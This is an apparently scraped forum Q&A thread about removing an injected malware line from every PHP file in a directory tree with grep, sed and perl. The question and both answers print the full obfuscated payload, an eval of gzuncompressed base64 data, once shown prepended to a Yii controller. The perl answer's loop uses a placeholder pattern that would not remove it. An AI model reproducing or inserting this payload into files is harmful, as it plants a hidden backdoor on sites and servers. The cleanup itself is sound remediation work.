# How to replace empty string with match string in all file with all directory in Linux

Tags: linux

I get virus string in all file. how to remove this match string in all file in all directory.

**This is my actual file.**

```
<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy4Q248gxUvAavwjhpgWQPO/+ab74ZkdottstN7XVeZkpRKeRnmJIFyUSyJbUqNWGgM3XHXAKSklJSdXDfg0l4t+PZ7XgdrN4Hq1vrKgzfxu/Qii9eBW9C65PjTNvxt+8/f/14fJyD1lDb1iXXKvKHQ2a5VlQNRqj7mqUqqsYTdIVaUCYNajfrRYDiQ5OAXe+LQ0EiZFmhusgx0FMyqkZDNC8k1UpQ1JY504ByDSloYTmzVGkGCbf/QiFQtOMvvx++PjhTkdpFuBK5Kk4Hiarh8L9Z3OeS1nzuddaggfvnaYJk7fC5RG2hRjpSyAp2SqaBLUPWSA7SFESlqUs2upRGyA0SjTEgRqssw/o9opYoCmYQ0OVyeb0IbnHu0cTkcSloXBo06J7bIgiTJoHZFt9HMTKIy8gfDXZIgG+5obgJbOdFb9zr945Bf2TA92vG7sIQrcpNs81O76x3ir7YweEWiOHNVdwpZep9bt+ZXTGggbat1yoBI5ScEm5MPvU8/2zQjaqz/uC86/uj7njiCUmbZVXdnOe4FirYMaQlJzWicrENGJIylhVkg0CaI3NmTFKR/vuflvrkmB1jXjeI3WdRM8YAOG/m+wMpCvZB')));?><?php

namespace app\controllers;

use app\components\BackendController;
use Yii;

class DashboardController extends BackendController
{
    /**
     * @inheritdoc
     */

    public function beforeAction($event)
    {
        return parent::beforeAction($event);
    }
.....
....
?>
```

**This is virus string. I required remove this string in my file.**

```
<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy4Q248gxUvAavwjhpgWQPO/+ab74ZkdottstN7XVeZkpRKeRnmJIFyUSyJbUqNWGgM3XHXAKSklJSdXDfg0l4t+PZ7XgdrN4Hq1vrKgzfxu/Qii9eBW9C65PjTNvxt+8/f/14fJyD1lDb1iXXKvKHQ2a5VlQNRqj7mqUqqsYTdIVaUCYNajfrRYDiQ5OAXe+LQ0EiZFmhusgx0FMyqkZDNC8k1UpQ1JY504ByDSloYTmzVGkGCbf/QiFQtOMvvx++PjhTkdpFuBK5Kk4Hiarh8L9Z3OeS1nzuddaggfvnaYJk7fC5RG2hRjpSyAp2SqaBLUPWSA7SFESlqUs2upRGyA0SjTEgRqssw/o9opYoCmYQ0OVyeb0IbnHu0cTkcSloXBo06J7bIgiTJoHZFt9HMTKIy8gfDXZIgG+5obgJbOdFb9zr945Bf2TA92vG7sIQrcpNs81O76x3ir7YweEWiOHNVdwpZep9bt+ZXTGggbat1yoBI5ScEm5MPvU8/2zQjaqz/uC86/uj7njiCUmbZVXdnOe4FirYMaQlJzWicrENGJIylhVkg0CaI3NmTFKR/vuflvrkmB1jXjeI3WdRM8YAOG/m+wMpCvZB')));?>
```

Comment: What have you tried so far?

Comment: yes...tried with grep and sed command

Comment: Add the actual code that you tried to the question. We can't tell what you did wrong if you don't show it.

Comment: `grep -vF 'string' filename` is the way to go.

Answer (score 1):

It is great if you have perl use the following code snippet for you job.

to find all the files with the snippet use:

```
grep -H -R "<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy4Q248gxUvAavwjhpgWQPO/+ab74ZkdottstN7XVeZkpRKeRnmJIFyUSyJbUqNWGgM3XHXAKSklJSdXDfg0l4t+PZ7XgdrN4Hq1vrKgzfxu/Qii9eBW9C65PjTNvxt+8/f/14fJyD1lDb1iXXKvKHQ2a5VlQNRqj7mqUqqsYTdIVaUCYNajfrRYDiQ5OAXe+LQ0EiZFmhusgx0FMyqkZDNC8k1UpQ1JY504ByDSloYTmzVGkGCbf/QiFQtOMvvx++PjhTkdpFuBK5Kk4Hiarh8L9Z3OeS1nzuddaggfvnaYJk7fC5RG2hRjpSyAp2SqaBLUPWSA7SFESlqUs2upRGyA0SjTEgRqssw/o9opYoCmYQ0OVyeb0IbnHu0cTkcSloXBo06J7bIgiTJoHZFt9HMTKIy8gfDXZIgG+5obgJbOdFb9zr945Bf2TA92vG7sIQrcpNs81O76x3ir7YweEWiOHNVdwpZep9bt+ZXTGggbat1yoBI5ScEm5MPvU8/2zQjaqz/uC86/uj7njiCUmbZVXdnOe4FirYMaQlJzWicrENGJIylhVkg0CaI3NmTFKR/vuflvrkmB1jXjeI3WdRM8YAOG/m+wMpCvZB')));?>" /* | cut -d: -f1 > filelist
```

This will give you the names of all the files having your required string in all the files in your system.

To replace in all the files you can use the following code snippet

```
#/bin/bash
 while IFS=$'\n\r' read -r line_data; do
    perl -i -pe 's/newstring/change/g' ${line_data}
 done < ./filelist
```

I guess this should work for you.

Answer (score 0):

Try to use sed for replacing your virus string in the file.

Example:
*filename: code.php*

```
 sed "s,<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy4Q248gxUvAavwjhpgWQPO/+ab74ZkdottstN7XVeZkpRKeRnmJIFyUSyJbUqNWGgM3XHXAKSklJSdXDfg0l4t+PZ7XgdrN4Hq1vrKgzfxu/Qii9eBW9C65PjTNvxt+8/f/14fJyD1lDb1iXXKvKHQ2a5VlQNRqj7mqUqqsYTdIVaUCYNajfrRYDiQ5OAXe+LQ0EiZFmhusgx0FMyqkZDNC8k1UpQ1JY504ByDSloYTmzVGkGCbf/QiFQtOMvvx++PjhTkdpFuBK5Kk4Hiarh8L9Z3OeS1nzuddaggfvnaYJk7fC5RG2hRjpSyAp2SqaBLUPWSA7SFESlqUs2upRGyA0SjTEgRqssw/o9opYoCmYQ0OVyeb0IbnHu0cTkcSloXBo06J7bIgiTJoHZFt9HMTKIy8gfDXZIgG+5obgJbOdFb9zr945Bf2TA92vG7sIQrcpNs81O76x3ir7YweEWiOHNVdwpZep9bt+ZXTGggbat1yoBI5ScEm5MPvU8/2zQjaqz/uC86/uj7njiCUmbZVXdnOe4FirYMaQlJzWicrENGJIylhVkg0CaI3NmTFKR/vuflvrkmB1jXjeI3WdRM8YAOG/m+wMpCvZB')));?>,,g" code.php
```

You can also use -i option in the above command with sed(this will edit the file itself and replace your virus string with blank).

Ex:`sed -i "s/<old_pattern>/<new_pattern>/g" <filename>`